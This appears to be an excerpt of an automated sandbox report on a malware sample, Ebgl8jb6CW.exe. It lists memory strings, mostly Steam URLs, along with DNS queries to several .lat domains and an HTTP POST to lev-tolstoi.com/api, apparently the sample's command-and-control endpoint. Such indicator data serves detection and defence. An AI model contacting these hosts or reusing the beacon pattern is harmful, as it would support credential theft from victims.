charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 26 Dec 2024 11:45:14 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ttps://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: observerfry.lat
Source: global traffic	DNS traffic detected: DNS query: wordyfindy.lat
Source: global traffic	DNS traffic detected: DNS query: slipperyloo.lat
Source: global traffic	DNS traffic detected: DNS query: manyrestro.lat
Source: global traffic	DNS traffic detected: DNS query: shapestickyr.lat
Source: global traffic	DNS traffic detected: DNS query: talkynicer.lat
Source: global traffic	DNS traffic detected: DNS query: curverpluch.lat
Source: global traffic	DNS traffic detected: DNS query: tentabatte.lat
Source: global traffic	DNS traffic detected: DNS query: bashfulacid.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840372781.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875627830.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C2C000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862579439.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1840301717.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1863000633.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875766412.0000000000C82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: Ebgl8jb6CW.exe, 00000000.00000002.1875766412.0000000000C82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/pi
Source: Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/vo
Source: Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875766412.0000000000C82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/vo(A
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com:443/api
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: Ebgl8jb6CW.exe, 00000000.00000003.1862622753.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000003.1874104555.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Ebgl8jb6CW.exe, 00000000.00000002.1875673200.0000000000C33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://manyrestro.lat:443/api
Source: Ebgl8jb6CW.exe, 00000000.00000003.1840324402.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
